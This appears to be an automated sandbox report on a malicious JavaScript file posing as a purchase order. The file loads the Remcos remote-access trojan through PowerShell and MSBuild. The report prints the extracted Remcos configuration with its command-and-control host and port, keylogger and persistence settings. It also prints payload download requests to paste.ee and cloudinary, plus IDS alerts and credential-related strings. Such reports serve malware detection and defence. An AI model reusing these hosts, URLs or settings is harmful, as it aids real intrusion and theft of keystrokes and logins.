                      Source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["160.25.73.25:6426:1", "ruffella.duckdns.org:6426:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-QM0FWK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                      Source: PO_0099822111ORDER.js | Virustotal: Detection: 14%
                      Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000A.00000002.3636685740.0000000002BEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR
                      Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,10_2_0043293A
                      Source: MSBuild.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

                      Exploits

                      Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 7040, type: MEMORYSTR

                      Privilege Escalation

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00406764 _wcslen,CoGetObject,10_2_00406764
                      Source: unknown | HTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49710 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49711 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 151.101.193.137:443 -> 192.168.2.12:49711 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.12:49719 version: TLS 1.2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,10_2_0041B42F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040B53A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0044D5E9 FindFirstFileExA,10_2_0044D5E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,10_2_004089A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00406AC2 FindFirstFileW,FindNextFileW,10_2_00406AC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,10_2_00407A8C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00418C69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,10_2_00408DA7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_10006580 FindFirstFileExA,10_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,10_2_00406F06

                      Software Vulnerabilities

                      Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.12:49721 -> 160.25.73.25:6426
                      Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.12:49720 -> 160.25.73.25:6426
                      Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 104.21.84.67:443 -> 192.168.2.12:49719
                      Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 104.21.84.67:443 -> 192.168.2.12:49719
                      Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.193.137:443 -> 192.168.2.12:49711
                      Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 104.21.84.67:443 -> 192.168.2.12:49719
                      Source: C:\Windows\System32\wscript.exe | Network Connect: 151.101.193.137 443
                      Source: Malware configuration extractor | URLs: ruffella.duckdns.org
                      Source: Malware configuration extractor | IPs: 160.25.73.25
                      Source: unknown | DNS query: name: paste.ee
                      Source: global traffic | TCP traffic: 192.168.2.12:49720 -> 160.25.73.25:6426
                      Source: global traffic | HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1 | Host: res.cloudinary.com | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /r/iDcBt/0 HTTP/1.1 | Host: paste.ee | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                      Source: Joe Sandbox View | IP Address: 151.101.193.137 151.101.193.137
                      Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                      Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.12:49722 -> 178.237.33.50:80
                      Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.12:49719 -> 104.21.84.67:443
                      Source: global traffic | HTTP traffic detected: GET /dzakc3wag/raw/upload/v1734112417/uploaded_textfile HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: res.cloudinary.com | Connection: Keep-Alive
                      Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.60
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: unknown | TCP traffic detected without corresponding DNS query: 160.25.73.25
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_004260F7 recv,10_2_004260F7
                      Source: global traffic | HTTP traffic detected: GET /dzakc3wag/raw/upload/v1734112417/uploaded_textfile HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: res.cloudinary.com | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1 | Host: res.cloudinary.com | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /r/iDcBt/0 HTTP/1.1 | Host: paste.ee | Connection: Keep-Alive
                      Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                      Source: MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                      Source: MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                      Source: MSBuild.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: MSBuild.exe, 0000000B.00000002.2763342902.00000000013F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                      Source: MSBuild.exe, 0000000B.00000002.2763342902.00000000013F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                      Source: MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: global traffic | DNS traffic detected: DNS query: res.cloudinary.com
                      Source: global traffic | DNS traffic detected: DNS query: paste.ee
                      Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crt0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0H
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/GeoTrustGlobalTLSRSA4096SHA2562022CA1.crl0
                      Source: MSBuild.exe, MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3633339065.0000000000F53000.00000004.00000020.00020000.00000000.sdmp, bhvFC84.tmp.11.dr | String found in binary or memory: http://geoplugin.net/json.gp
                      Source: MSBuild.exe, 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp3
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0:
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0H
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0I
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0Q
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://ocsp.msocsp.com0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://ocsp.msocsp.com0S
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000004.00000002.2940617562.00000233DC3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2664935564.0000021680631000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://www.digicert.com/CPS0
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: http://www.digicert.com/CPS0~
                      Source: MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
                      Source: MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
                      Source: MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                      Source: MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
                      Source: MSBuild.exe, 0000000B.00000002.2761597224.0000000000EF4000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
                      Source: MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?137019cd0ea2ea141b322d7a
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?420dfb4adf33cca8e8445be7
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                      Source: bhvFC84.tmp.11.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
                      Source: powershell.exe, 00000004.00000002.2940617562.00000233DC3A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2940617562.00000233DC38B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2664935564.0000021680631000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?110eb0177c05b2ea3775fea8
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?e2a80f8d2c945664c83931e8
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?7ef117c32775e4d2c961085bcb227765
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?b667cfe495ba4e8bf765a44145cc83a9
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
                      Source: powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: wscript.exe, 00000000.00000002.2993603208.00000137F14D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F14CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992820674.00000137F14D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: MSBuild.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
                      Source: bhvFC84.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-12-20-17/PreSignInSettingsConfig.json
